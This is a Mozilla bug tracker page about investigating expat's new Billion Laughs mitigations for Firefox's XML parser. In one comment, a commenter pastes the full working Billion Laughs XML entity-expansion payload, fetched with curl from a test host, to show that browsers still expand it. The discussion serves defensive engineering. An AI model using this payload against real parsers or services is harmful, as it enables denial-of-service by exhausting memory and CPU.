Open Bug 1713841 Opened 3 years ago Updated 3 months ago

Investigate new Billion Laughs mitigations in expat

Categories

(Core :: XML, enhancement)

enhancement

Tracking

()

People

(Reporter: tjr, Unassigned)

References

Details

(Keywords: sec-want)

Expat released a new version with improved mitigations for the Billion Laughs attack.

https://github.com/libexpat/libexpat/blob/R_2_4_0/expat/Changes

This bug is to determine if we need these improvements (and if so, to land them.)

Peter, is this you?

Flags: needinfo?(peterv)
Group: core-security → dom-core-security

Looks like we have bug 151380 filed as a general bug on this attack on XML.

Keywords: sec-want

With bug 151380 public and the announcement of this fix public hiding this bug will only catch us some dupes.

Group: dom-core-security

Is disabling entity expansion in the Firefox XML interpreter conditional to whether it's an XHTML document? Then indeed, it is difficult to figure if entities need expansion according to the XHTML spec or if they are part of a malicious denial-of-service payload.

The expansion still occurs both in Firefox and Chrome.

$ curl -isS https://unhack.ca/billion-laughs-attack.xml
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 21:42:39 GMT
Server: Apache/2.4.52 (Debian)
Last-Modified: Wed, 19 Jan 2022 21:40:52 GMT
ETag: "32a-5d5f63d6c7d41"
Accept-Ranges: bytes
Content-Length: 810
Vary: Accept-Encoding
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>

(In reply to Ilguiz Latypov from comment #3)

Is disabling entity expansion in the Firefox XML interpreter conditional to whether it's an XHTML document? Then indeed, it is difficult to figure if entities need expansion according to the XHTML spec or if they are part of a malicious denial-of-service payload.

The expansion still occurs both in Firefox and Chrome.
Forgot to paste the bottom of the curl output,

<lolz>&lol9;</lolz>

Let me know if we should give it a high priority.

Flags: needinfo?(peterv)
You need to log in before you can comment on or make changes to this bug.